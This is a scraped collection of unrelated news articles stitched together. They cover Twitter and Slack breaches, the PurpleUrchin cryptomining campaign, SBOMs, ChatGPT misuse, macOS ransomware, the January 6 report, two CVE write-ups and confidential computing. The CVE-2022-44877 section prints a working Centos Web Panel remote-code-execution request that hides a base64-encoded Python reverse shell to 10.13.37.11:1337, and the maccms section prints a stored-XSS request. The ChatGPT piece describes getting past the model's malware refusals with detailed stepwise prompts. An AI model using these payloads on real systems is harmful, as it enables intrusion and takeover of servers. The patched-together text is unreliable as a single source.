Plus: Russian spies uncovered in Europe, face recognition leads to another wrongful arrest, a new porn ID law, and more.

Ever since Elon Musk spent $44 billion on Twitter and laid off a large percentage of the company’s staff, there have been concerns about data breaches. Now it seems a security incident that predates Musk’s takeover is causing headaches. This week, it emerged that hackers released a trove of 200 million email addresses and their links to Twitter handles, which were likely gathered between June 2021 and January 2022. The sale of the data may put anonymous Twitter accounts at risk and heap further regulatory scrutiny on the company.

WhatsApp has launched a new anti-censorship tool that it hopes will help people in Iran to avoid government-enforced blocks on the messaging platform. The company has made it possible for people to use proxies to access WhatsApp and avoid government filtering. The tool is available globally. We’ve also explained what pig-butchering scams are and how to avoid falling into their traps.

Also this week, cybersecurity firm Mandiant revealed that it has seen Russian cyberespionage group Turla using innovative new hacking tactics in Ukraine. The group, which is believed to be connected to the FSB intelligence agency, was spotted piggybacking on dormant USB infections of other hacker groups. Turla registered expired domains of years-old malware and managed to take over its command-and-control servers.  

We also reported on the continued fallout of the EncroChat hack. In June 2020, police across Europe revealed they had hacked into the encrypted EncroChat phone network and collected more than 100 million messages from its users, many of them potentially serious criminals. Now thousands of people have been jailed based on the intelligence gathered, but the bust is raising wider questions around law enforcement hacking and the future of encrypted phone networks.

But that’s not all. Each week, we round up the security stories we didn’t cover in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there. 

On December 31, as millions of people were preparing for the start of 2023, Slack posted a new security update to its blog. In the post, the company says it detected a “security issue involving unauthorized access to a subset of Slack’s code repositories.” Starting on December 27, it found that an unknown threat actor had stolen Slack employee tokens and used them to access its external GitHub repository and download some of the company’s code.

“When notified of the incident, we immediately invalidated the stolen tokens and began investigating potential impact to our customers,” Slack’s disclosure says, adding that the attacker did not access customer data and Slack users don’t need to do anything. 

The incident is similar to a December 21 security incident disclosed by authentication firm Okta, as cybersecurity journalist Catalin Cimpanu notes. Just before Christmas, Okta revealed its code repositories had been accessed and copied.

Slack quickly discovered the incident and reported it. However, as spotted by Bleeping Computer, Slack’s security disclosure didn’t appear on its usual news blog. And in some parts of the world, the company included code to stop search engines including it in their results. In August 2022, Slack forced password resets after a bug had exposed hashed passwords for five years. 

A Black man in Georgia spent almost a week in jail after police reportedly relied on a face recognition match that was incorrect. Police in Louisiana used the technology to obtain an arrest warrant for Randal Reid in a theft case they were investigating. “I have never been to Louisiana a day in my life. Then they told me it was for theft. So not only have I not been to Louisiana, I also don’t steal,” Reid told local news site Nola.

The publication says a detective “took the algorithm at face value to secure a warrant” and says little is known about police use of face recognition technology in Louisiana. The names of any systems used have not been disclosed. However, this is just the latest case of face recognition technology being used in wrongful arrests. While police use of face recognition tech has quickly spread across US states, research has repeatedly shown it misidentifies people of color and women more frequently than white men.

On the first day of this year, Ukraine launched its deadliest missile strike against invading Russian troops to date. An attack on a temporary Russian barracks in Makiivka, in the Russian-occupied Donetsk region, killed 89 troops, the Russian defense ministry claims. Ukrainian officials say around 400 Russian soldiers were killed. In the aftermath, Russia’s defense ministry claimed the location of troops was identified because they were using mobile phones without permission. 

During the war, both sides have said they are able to intercept and locate phone calls. While Russia’s latest claim should be treated with caution, the conflict has highlighted how open source data can be used to target troops. Drones, satellite images, and social media posts have been used to monitor people on the frontlines.

A new law in Louisiana requires porn sites to verify the ages of visitors from the state to prove they are over 18. The law says age verification must be used when a website contains 33.3 percent or more pornographic content. In response to the law, PornHub, the world’s biggest porn website, now gives people the option to link their drivers license or government ID via a third-party service to prove they are legal adults. PornHub says it does not collect user data, but the move has raised fears of surveillance.

Around the world, countries are introducing laws that require porn site visitors to prove they’re old enough to view the explicit material. Lawmakers in Germany and France have threatened to block porn sites if they don’t put the measures in place. Meanwhile, in February 2022 Twitter started blocking adult content creators in Germany because age verification systems were not in place. The UK tried to introduce similar age-checking measures between 2017 and 2019; however, the plans collapsed due to porn website admins’ confusion, design flaws, and fears of data breaches.

The world of spies is, by its very nature, cloaked in secrecy. Nations deploy agents to countries to gather intelligence, recruit other assets, and influence events. But occasionally these spies get caught. Since Russia’s full-scale invasion of Ukraine in February 2022, more of Russia’s spies across Europe have been identified and expelled from countries. A new database from open source researcher @inteltakes has pulled together known cases of Russia’s spies in Europe since 2018. The database lists 41 entries of spies being exposed and, where possible, details each asset’s nationality, profession, and the service they were recruited by.

Slack Discloses Breach of Its Github Code Repository

The Automated Libra group is deploying all components of its campaign in an automated manner via containers, stealing free trial resources for cryptomining, but the threat could get larger.

More information has become available on "PurpleUrchin," a malicious campaign in which a threat group called Automated Libra is using DevOps and continuous integration/continuous deployment (CI/CD) practices to mine cryptocurrency on cloud platforms using free trial accounts.

The campaign began in August 2019 and has mainly targeted platforms such as GitHub, Heroku, and ToggleBox. Security vendor Sysdig first reported on the campaign last October. This week, Palo Alto Networks' Unit 42 threat hunting team provided fresh insight on the campaign based on a recent analysis of the threat group's activities — and noted that while cryptomining is the game now, the infrastructure could be used to deliver much worse threats down the road.

Unit 42's research showed that Automated Libra has so far created some 180,000 free trial accounts on various cloud platforms — substantially more than Sysdig had initially reported — using an automated container-based approach for spinning them up. At its peak last November, Automated Libra was creating between three and five new accounts on GitHub every minute. Sysdig previously had estimated that the coin-mining activity via free trial accounts was costing GitHub some $100,000 in lost revenue per user account.

**A Fully Containerized Operation**

Unit 42's analysis showed each individual component of PurpleUrchin's cryptomining operation — from user account creation to coin-mining and trading — shipped within a container and deployed in a highly automated manner. 

An initial container contains all the tools needed for automatic account creation. That container automatically creates new accounts on a targeted cloud provider's platform, while also pulling down tools for creating additional containers with cryptomining components for each of the user accounts.

These additional containers house the individual and unique containerized components of the larger operation, says William Gamazo, principal threat researcher for Unit 42 at Palo Alto Networks. For example, they include containers specific to the accounts created for each targeted cloud provider, containers created for system administration (like panel displays for monitoring the mining operation), and containers created for coin-miners themselves.

The threat actors have implemented each component in the architecture as a container, Gamazo says. "In some cases, the entire process starts with a single script," he notes. That script calls on a configuration file stored in DockerHub, GitHub, or BitBucket for its base operational guidelines, Gamazo tells Dark Reading.

"From here, the process becomes highly dynamic and modular, with the creation of a user account that pulls down a container that will start the mass container generation process — essentially a single container that builds all of the additional containers required to perform the mining operation."

The container functionality for initial account creation on GitHub also includes a feature that allows Automated Libra to bypass CAPTCHA images using relatively straightforward image analysis techniques. The CAPTCHA bypass technique basically reuses publicly available tools, though in some cases the threat actors did perform some custom processing.

"While we didn’t feel the actor was very sophisticated, they were very effective with this tactic," Gamazo notes.

**A DevOps Approach to Optimize Resource Utilization**

Unit 42 researchers assessed that Automated Libra had adopted the DevOps and CI/CD approaches to optimize its ability to utilize the limited resources available to them under the free trial programs that many cloud vendors offer. 

"We have not directly witnessed other threat actors performing these types of containerized operations," Gamazo says. "However, last year we saw DDoS attack implementations using containers as part of the deployment," he notes pointing to a pro-Ukrainian denial-of-service campaign that CrowdStrike reported on last May that involved compromised Docker honeypots.

To create user accounts for free trials, the threat actors likely used stolen or fake credit cards, Unit 42 said. In some cases, the attackers adopted what the security vendor described as a "play and run" approach where they used a cloud provider's resources for a certain period of time but then disappeared without paying the bill for those services. 

The largest unpaid balance that Unit 42 researchers were able to uncover during their research was just $190. But the unpaid balances in other fake accounts could have been much larger considering the scale and breadth of the PurpleUrchin cryptomining operation, they noted.

**Cryptomining Now; Much Worse Later?**

Cryptomining attacks — where a threat actor stealthily uses an organization's computing resources to mine for cryptocurrencies — have become extremely common in recent years. A study that Kaspersky conducted last year showed that threat actors mainly distribute malicious mining software via unpatched vulnerabilities. In 2022's third quarter, more than 15% of vulnerability exploits that Kaspersky analyzed involved cryptomining tools. In the same quarter, Kaspersky counted more than 150,000 new miner variants, or more than triple the number from 2021's third quarter.

Nathaniel Quist, manager of cloud threat intelligence at Unit 42, says that in the PurpleUrchin campaign, Automated Libra actors were using free or limited-use cloud services specifically for their CPU resources. But that doesn't mean that they couldn’t have used it for other purposes as well. The actors, for instance, could have used these resources to perform malicious operations targeting victim organizations such as scanning, brute-forcing accounts, or hosting malicious content.

"If this happened, the victim would have been targeted by attacks originating from the trusted cloud service providers where the actors were creating these accounts," he notes.

The key takeaway for enterprise organizations is that threat actors will increasingly use containers for malicious infrastructure deployment in coming years. "Trusted sources such as cloud providers, cloud storage services, and public services hosted on clouds will be leveraged for launching attacks and it will be prevalent and difficult to detect," he says.

PurpleUrchin Gang Embraces DevOps in Massive Cloud Malware Campaign

It's imperative we collaborate and partner to improve software security. This may require developing tools and standards that can enrich SBOMs and provide deeper analysis.

Many in our industry are weighing the benefits that software bills of materials (SBOMs) could possibly bring to software quality and security. I think SBOMs are needed to understand and assess risk in software because they should provide visibility into the software construction process for a given software system. At some level, SBOMs already exist for certain products and software systems; however, their application for evaluating quality and security as stipulated in Executive Order 14028, Improving the Nation's Cybersecurity and recent federal guidance by the US Office of Management and Budget, the National Institute of Standards and Technology, and the Cybersecurity Infrastructure and Security Agency is fairly new and unproven at scale.

**The Royce Bill That Never Passed****

Around 2013, SBOM legislation H.R.5793 – Cyber Supply Chain Management and Transparency Act (known as the Royce Bill) was introduced but never gained the momentum it needed to pass as a mandate, bill, or requirement. The industry did not then have the appetite for transparency to manage software supply chain risk.

The issues this legislation would have addressed are outlined in the Congressional Record – Extensions of Remarks. These issues have now been exacerbated given the overwhelming amount of complexity and growing size in modern software development, and the increasing rate of attacks against open source software. With the increasing consumption rate of open source software in modern software development, consumers must be aware of the technical debt in open source software projects that has accumulated over time to better manage software risk. The idea of more software complexity, larger software systems, and mounting technical debt does not bode well for the federal government's desire for software integrity and trustworthiness through the software supply chain.

The fact that the Royce Bill didn't pass can be seen as a missed opportunity to address the growing threats and risk in software security at the time. Almost a decade later, the industry is still struggling to figure out how to implement SBOMs and strike the right balance to make them useful and not a target for adversaries to exploit. This raises major concern in industry about whether SBOMs are ready for prime time given the skepticism regarding the current requirements outlined in federal guidance.

****SBOM Must Inform About Unknown Risk****

One of the challenges for SBOMs is advancing and understanding how risky software is determined. I use the term "risky" because all software has vulnerabilities, and the SBOM must be able to differentiate or provide context to the level of risk associated with a software component, whether in isolation or once it has been implemented and integrated into a software system. To simply say you can't use this software component because it has CVEs (common vulnerabilities and exposures) associated with it becomes moot because all software can have vulnerabilities. SBOMs must be able to succinctly qualify which CVEs are the most dangerous and exploitable given the context the software will be implemented and used — the component function (logging, encryption, access control, authorization), the environment, and whether it can be hardened to reduce a given attack surface. The way in which software components are integrated into a system matters because software components can be implemented poorly or incorrectly, exposing vulnerabilities in software systems.

Using CVEs to establish a security baseline for open source software consumption make sense; however, tallying a bunch of CVEs to determine what software is less risky or riskier only focuses on the "known knowns" (as shown in the figure below) and does very little to help organizations understand what weaknesses are lurking that may expose vulnerabilities and impact the overall hygiene of that software component (over a period of time). Furthermore, the current state of practice regarding SBOMs doesn't encourage software supply chainers to understand the defect proneness or attack proneness rates associated with software. This is important because some software components are highly targeted and require significant patching due to inherent technical debt, low code quality, and security issues that expose vulnerabilities. More patching means developers and engineering teams are spending less time on creating and delivering new features and functionality to customers.

Defect proneness refers to the likelihood that a software component will be defective after a software product is released. There are various socio-technical factors that contribute to defect proneness such as low code quality and design flaws. Attack proneness refers to the rate at which software components can be successfully exploited, or the likelihood that software components will contain exploitable weaknesses — bug, defect, or flaw — or vulnerabilities.

    

Source: Kevin Greene

SBOM solutions must give organizations visibility into potential risk for a given software component as shown in the figure above, helping organizations make informed decisions about which software components to use and which software components to avoid. For instance, advice in the National Security Agency (NSA) Cybersecurity Information Sheet encourages developers to avoid using software developed in C and C++ because those programming languages were not intended to enforce good memory management checks. It will be interesting to see how this advice will affect the software supply chain, mainly for embedded safety critical systems, and whether suppliers will turn to programming languages that are memory safe, such as Rust and Go.

****Go Deeper to Guide SBOM****

SBOMs are not going away, so it's imperative we all collaborate and partner to improve software security. This may require developing tools and standards that can enrich SBOMs and provide deeper analysis and insight about the characteristics of software that help inform about software risk. This will help organizations effectively evaluate and attest to software integrity, as well as other software assurance properties. Ultimately, it's important for software supply chainers to understand not just the risk associated with a given software component but the potential maintenance associated with using that software component over a period of time, given the challenges in industry to remediate vulnerabilities in software in a timely fashion. The use of defect and attack proneness rates could provide actionable intelligence that helps lower the consumption of risky software with poor hygiene, and guide software supply chainers in building software systems that are more resilient to cyberattacks. 

In theory, software components with high defect and attack proneness rates should be avoided to help stimulate and encourage the use of alternatives with better hygiene. In my opinion, SBOMs don't improve code quality and security directly, but they can make software supply chainers more aware of risk in their software construction process. Improving code quality and security for open source software requires a culture shift given that having many eyes does not make all bugs shallow.

**

Don't Be Blindsided by Software Bills of Materials

The role of artificial intelligence in cybersecurity is growing. A new AI model highlights the opportunities and challenges.

_Artificial intelligence (AI) has the potential to revolutionize many aspects of our lives, including how we approach cybersecurity. However, it also presents new risks and challenges that need to be carefully managed._

_One way that AI can be used in cybersecurity is through the development of intelligent systems that can detect and respond to cyber threats._

This was the AI chatbot’s reply when I asked it to write about AI and cyber threats. I am sure by now you know I am talking about the most popular lad in town, ChatGPT.

In November 2022, OpenAI, an AI research and development company, introduced ChatGPT (Generative Pre-trained Transformer) based on a variation of its InstructGPT model, which is trained on a massive pool of data to answer queries. It interacts in a conversational way once given a detailed prompt, admits mistakes, and even rejects inappropriate requests. Though only available for beta testing right now, it has become extremely popular among the public. OpenAI plans to launch an advanced version, ChatGPT-4, in 2023.

ChatGPT is different from other AI models in the way it can write software in different languages, debug the code, explain a complex topic in multiple ways, prepare for an interview, or draft an essay. Similar to what one can do through Web searches to learn these topics, ChatGPT makes such tasks easier, even providing the final output.

The wave of AI tools and apps has been growing for some time. Before ChatGPT, we saw the Lensa AI app and Dall-E 2 making noise for digitally creating images from text. Though these apps have shown exceptional results that could be nice to use, the digital art community was not very happy that their work, which was used to train these models, is now being used against them as it raised major privacy and ethical concerns. Artists have found their work was used to train the model and now has been used by app users to create images without their consent.

**Pros and Cons**

As with any new technology, ChatGPT has its own benefits and challenges and will have a significant impact on the cybersecurity market.

AI is a promising technology to help develop advanced cybersecurity products. Many believe broader use of AI and machine learning are critical to identifying potential threats more quickly. ChatGPT could play a crucial role in detecting and responding to cyberattacks and improving communication within the organization during such times. It could also be used for bug bounty programs. But where there is the technology, they are cyber-risks, which must not be overlooked.

**Good or Bad Code**

ChatGPT will not write a malware code if asked to write one; it does have guardrails, such as security protocols to identify inappropriate requests.

But in the past few days, developers have tried various ways to bypass the protocols and succeeded to get the desired output. If a prompt is detailed enough to explain to the bot steps of writing the malware instead of a direct prompt, it will answer the prompt, effectively constructing malware on demand.

Considering there are already criminal groups offering malware-as-a-service, with the assistance of an AI program such as ChatGPT, it may soon become quicker and easier for attackers to launch cyberattacks with the help of AI-generated code. ChatGPT has given the power to even less experienced attackers to be able to write a more accurate malware code, which previously could only be done by experts.

**Business Email Compromise**

ChatGPT is excellent at replying to any content query, such as emails and essays. This is especially applicable when paired with an attack method called business email compromise, or BEC.

With BEC, attackers use a template to generate a deceptive email that tricks a recipient into providing the attacker with the information or asset they want.

Security tools are often employed to detect BEC attacks, but with the help of ChatGPT, attackers could potentially have unique content for each email generated for them with the help of AI, making these attacks harder to detect.

Similarly, writing phishing emails may become easier, without any of the typos or unique formats that today are often critical to differentiate these attacks from legitimate emails. The scary part is it’s possible can add as many variations to the prompt, such as "_making the email look urgent_," "_email with a high likelihood of recipients clicking on the link_," "_social engineering email requestion wire transfer_," and so on.

Below was my attempt to see how ChatGPT would reply to my prompt, and it returned results that were surprisingly good.

    

**Where Do We Go From Here?**

ChatGPT tool is transformational in many cybersecurity scenarios if put to good use.

From my experience researching with the tool and from what the public is posting online, ChatGPT is proving to be accurate with most detailed requests, but it still is not as accurate as a human. The more prompts used, the more the model trains itself.

It will be interesting to see what potential uses, positive and negative, come with ChatGPT. One thing is for sure: The industry cannot merely wait and watch if it creates a security problem. Threats from AI are not a new problem it has been around, it's just that now ChatGPT is showing distinct examples that look scary. We expect the security vendors will be more proactive to implement behavioral AI-based tools to detect these AI-generated attacks.

ChatGPT Artificial Intelligence: An Upcoming Cybersecurity Threat?

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.
"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.
The initial vector for these

Endpoint Security / Cyber Threat

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.

"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.

The initial vector for these ransomware families involves what the Windows maker calls "user-assisted methods," wherein the victim downloads and installs trojanized applications.

Alternatively, it can also arrive as a second-stage payload that's dropped by an already existing malware on the infected host or as part of a supply chain attack.

Irrespective of the modus operandi employed, the attacks proceed along similar lines, with the threat actors relying on legitimate operating system features and exploiting vulnerabilities to break into the systems and encrypt files of interest.

This includes the use of the Unix find utility as well as library functions like opendir, readdir, and closedir to enumerate files. Another method pointed out by Microsoft, but not adopted by the ransomware strains, entails the NSFileManager Objective-C interface.

KeRanger, MacRansom, and EvilQuest have also been observed to utilize a combination of hardware- and software-based checks to determine if the malware is running in a virtual environment in an attempt to resist analysis and debugging attempts.

KeRanger, notably, employs a technique known as delayed execution to escape detection. It achieves this by sleeping for three days upon its launch before kick-starting its malicious functions.

Persistence, which is essential to ensuring that the malware is run even after a system restart, is established by means of launch agents and kernel queues, Microsoft pointed out.

While FileCoder uses the ZIP utility to encrypt files, KeRanger uses AES encryption in cipher block chaining (CBC) mode to achieve its goals. Both MacRansom and EvilQuest, on the other hand, leverage a symmetric encryption algorithm.

EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software.

It also packs in capabilities to execute any file directly from memory, effectively leaving no trace of the payload on disk.

"Ransomware continues to be one of the most prevalent and impactful threats affecting organizations, with attackers constantly evolving their techniques and expanding their tradecraft to cast a wider net of potential targets," Microsoft said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

The January 6 Committee’s 841-page report will go down as one of the most important documents in US history. These key details stand out.

To put a fine point on it: The Secret Service agents surrounding the Vice President believed they were about to be in a fight to the death to protect the man next in line for presidential succession. I’ve read and written about presidential security and history going back decades, and I can’t think of a parallel set of fears, except perhaps when Vice President Richard Nixon’s motorcade was attacked in Caracas in 1958, which was seen at the time as the “most violent attack ever perpetrated on a high American official while on foreign soil.” 

4\. Big unknowns remain 

As the committee notes, more than 30 witnesses invoked their Fifth Amendment privilege against self-incrimination, leading to some important holes in the committee’s knowledge. As the report says, “The Committee has substantial concerns regarding potential efforts to obstruct its investigation, including by certain counsel (some paid by groups connected to the former President) who may have advised clients to provide false or misleading testimony to the Committee.” It’ll be interesting whether any potential Justice Department indictments and investigations further pry back the lid on the White House and the role of people like Steve Bannon and Roger Stone.

5\. Parts of Trump’s plot targeted every level of government officials involved in counting and certifying elections

One of the most tragic hearings from the January 6 Committee focused last summer on the human toll of President Trump unleashing reckless personal attacks on the relatively anonymous local and state officials in battleground states who were charged with counting and certifying the votes—attacks so vicious and worrisome that some officials, who did nothing wrong and were serving in nonpartisan roles, fled their homes over safety concerns. And the final report is filled with page after page of details about the awful rhetoric—and worse—that Trump directed his supporters to unleash on officials in places like Arizona, Pennsylvania, Michigan, and Georgia. 

In Arizona, the committee reports, “Maricopa County Recorder Adrian Fontes testified before Congress that his family had ‘go-bags’ packed in case they needed to evacuate and that, because of the threats, he had moved his children ‘out of the family home at least once for three days in the wake of serious threats to \[his\] family’s safety.’” In Michigan, after Republican Senate Majority Leader Mike Shirkey and Republican House Speaker Lee Chatfield resisted Trump’s entreaties to overturn the state’s results, “\[Trump\] or his team maliciously tweeted out Shirkey’s personal cell phone number and a number for Chatfield that turned out to be wrong. Shirkey received nearly 4,000 text messages after that, and another private citizen reported being inundated with calls and texts intended for Chatfield.” As the committee says, the threats from Trump and myriad other supporters were un-American and beyond the pale: “This, again, is the conduct of thugs and criminals, each of whom should be held accountable.” 

Beyond the election officials themselves, the report has ample new detail about the Trump campaign’s efforts to create and forward to the National Archives and Congress slates of fake electors, people who would vote for Trump rather than Biden, as their states had properly certified. One of the interesting questions left after the January 6 report is whether state attorneys general or local prosecutors in any state will read and examine the evidence of the fake elector scheme for potential criminal charges too. 

6\. Trump’s legal and criminal exposure is real 

The January 6 Committee’s own criminal referrals made headlines in December, but the final report reminds us that federal judge David Carter also concluded as part of the court fight over the committee’s work that President Trump likely violated two criminal statutes: 18 U.S.C. § 1512(c) (corruptly obstructing, impeding or influencing Congress’s official proceeding to count electoral votes); and 18 U.S.C. § 371 (conspiring to defraud the United States). And indeed, any prosecutor looking at this report will see both plenty of evidence of corrupt acts and, notably, _knowledge_ that Trump understood he was acting corruptly—because White House aides, lawyers, and campaign officials kept telling him he was doing so. As the committee wrote, “President Trump made corrupt, dishonest, and unlawful choices to pursue his plans.”

7\. The Justice Department came close to a meltdown 

As someone who has written books about Nixon’s 1973 Saturday Night Massacre and the 2005 Comey-Mueller-Bush showdown over the NSA wiretapping program STELLAR WIND, my eyes were wide open as I read the sections about how Trump tried to install Jeffrey Clark as acting attorney general in one of his final gambits to overturn the election—an event that almost caused the entire leadership of the Justice Department to resign. Bill Barr, of course, had resigned early, leaving acting attorney general Jeffrey Rosen in charge of the department in January 2021, alongside acting deputy attorney general Richard Donoghue. The two faced down Trump as he tried to install Clark, who was willing to sign a letter saying DOJ had doubts about the election. Donoghue saw the possibility the letter “may very well have spiraled us into a constitutional crisis,” and White House counsel Pat Cipollone declared it a “murder-suicide pact.”

While Trump persisted, he was informed that all of the other assistant attorneys general would resign if he pushed the change—but the committee’s work found that even as the showdown unfolded, “contemporaneous White House documents suggest that Clark had _already_ \[italics in original\] been appointed as the acting attorney general.” Ultimately, Trump backed down as the potential mass resignations spiraled, and was told by assistant attorney general Steve Engel—himself a beloved Trump appointee—that “Clark would be here by himself with a hostile building, those folks who remained, and nothing would get done.” Clark, Engel said, would be leading a “graveyard.” Trump finally said, “It’s not going to be worth the breakage,” and dropped the plan.

8\. The US government had reliable, solid intelligence that bad stuff might happen on January 6—and it failed to take action

The committee makes clear in the second sentence of its executive summary that Trump owns everything that happened on January 6, saying its “overriding and straightforward conclusion: the central cause of January 6 was one man, former President Donald Trump, whom many others followed. None of the events of January 6 would have happened without him.” But it’s also clear from the committee report that the US government, both its security agencies and top White House staff, failed to act on warnings that armed, violent individuals were coming to Washington on January 6 in response to the president’s tweet on December 19, 2020, summoning them and promising, “Be there, will be wild!”

In fact, no less than the chairman of the Joint Chiefs of Staff, Gen. Mark Milley, remembers deputy secretary of defense David Norquist saying on a National Security Council call, “the greatest threat is a direct assault on the Capitol.” As Milley says, “I’ll never forget it.” The Secret Service was warned repeatedly, including on Christmas Eve in a document entitled “Armed and Ready, Mr. President” that summarized worrisome tweets, and at a December 30 internal intelligence briefing that specifically mentioned the fiery presidential tweet. The Capitol Police were warned, both by civilian extremism researchers as well as by the Secret Service itself, which forwarded warnings on December 29. The FBI issued a DC-area intelligence bulletin on January 5, warning of “Potential for Violence in Washington, D.C. Area in Connection with Planned ‘StopTheSteal’ Protest on 6 January 2021.” The bulletin even included maps of the Capitol that had been posted to a pro-Trump website. And there was a lot more beyond.

January 6 Report: 11 Details You May Have Missed

A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.

**CVE-2022-44870**

maccms admin+ xss attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

1.  Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#23

Go to background, go to Basics > AD Management > Name,

Insert payload1 in the name box:

It can cause XSS attacks.

Vulnerability name：Storage type xss

Vulnerability level：Medium risk

Vulnerability location： Advertising management-->name

Insert <script>alert(1)</script> at cat\_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

3.Recurring vulnerabilities and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: _/_

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat\_id=&cat\_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat\_code=111

CVE-2022-44870: CVE-2022-44870/README.md at main · Cedric1314/CVE-2022-44870

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

\# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

\[+\] Centos Web Panel 7 Unauthenticated Remote Code Execution

\[+\] Centos Web Panel 7 - < 0.9.8.1147

\[+\] Affected Component ip:2031/login/index.php?login=$(whoami)

\[+\] Discoverer: Numan Türle @ Gais Cyber Security

\[+\] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194

\## Proof of concept:

POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1

Host: 10.13.37.10:2031

Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82

Content-Length: 40

Origin: https://10.13.37.10:2031

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://10.13.37.10:2031/login/index.php?login=failed

Accept-Encoding: gzip, deflate

Accept-Language: en

Connection: close

username=root&password=toor&commit=Login

\## Solution

Upgrade to CWP7 current version.

CVE-2022-44877: # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

Encrypting data while in use, not just in transit and at rest, closes one more avenue of cyberattack.

Digital transformation initiatives, spurred by COVID-19, are helping companies scale new heights in efficiency and productivity. However, they have also highlighted to enterprise leaders the need for tighter cybersecurity measures — especially as attackers continue to ride the wave of new technologies to launch sophisticated attacks. The number of records exposed in data breaches consistently went up throughout 2022 — 3.33 million records in the first quarter of 2022, 5.54 million records in the second quarter, and 14.78 million records in the third quarter — according to data from Statista.

Organizations face various challenges as they grapple with managing and securing the explosion of data created, in part, by remote environments. This, coupled with the lack of visibility across dispersed networks and growing migration to the cloud, has increased the risk of attacks across multiple industries, including healthcare, financial services, and decentralized finance (DeFi).

Confidential computing segregates data and code from the host computer's system and makes it harder for unauthorized third parties to access the data. The way that confidential computing protects sensitive data could smooth the way for increased cloud adoption in highly regulated sectors such as finance and healthcare, according to Gartner.

As more organizations handle large volumes of data, ushering in a greater need for privacy and data security, confidential computing is poised to close that security gap by ensuring data remains confidential at all times — while at rest, in transit, and in use.

**A Different Approach to Cybersecurity**

Most encryption schemes focus on protecting while at rest, or while in transit. Confidential computing protects data while in use — by allowing data to remain encrypted even as it’s being processed and used in applications. The market for confidential computing is expected to grow up to $54 billion by 2026, according to a report by Everest Group.

"Everybody wants to continue to reduce the attack surface of data. Up to this point, it is obviously encrypted in transit and at rest. Confidential computing solves the encrypted in-use at the infrastructure level," said Justin Boitano, vice president and general manager of Nvidia's enterprise and edge computing operations, in a previous article on Dark Reading.

Anil Rao, vice president and general manager for systems architecture and engineering at Intel's office of the chief technology officer, also noted in the article that confidential computing will also help enterprises build a new class of applications where third-party data sets can mingle with proprietary data sets in a secure area to create better learning models.

The hardware element of confidential computing makes it uniquely secure, says Jay Harel, VP of product at Opaque Systems. "A hacker must literally crack the CPU open and tap into the silicon die in order to steal any confidential data," Harel says. "Most data breaches happen remotely, over the Internet. Confidential computing requires physical access to the hardware, making a breach much less likely."

Cloud vendors Microsoft Azure and Google Cloud make confidential computing available through CPUs from Intel and AMD, while Amazon AWS uses its own Nitro technology. "I wouldn't say that the hardware is fully mainstream yet, as most compute resources offered by these vendors still don't have confidential computing capabilities," Harel notes.

As Noam Dror, senior vice president of solution engineering at Hub Security, puts it, "Today, when hackers get past standard security controls, they can access data in use which is totally exposed and unencrypted. Existing cybersecurity measures have a hard time dealing with these issues. This is where confidential computing comes in, providing comprehensive cyber protection across all levels. These most sensitive data must be protected leveraging confidential computing because the computing environment will always be vulnerable."

**Helps Industries Share Data Securely**

The confidential computing approach to cybersecurity offers several advantages, particularly in sectors where client or patient data is highly sensitive and regulated — like the healthcare sector, for example. In such sectors, confidential computing can enable secure multiparty training of AI for different purposes and ensure data privacy.

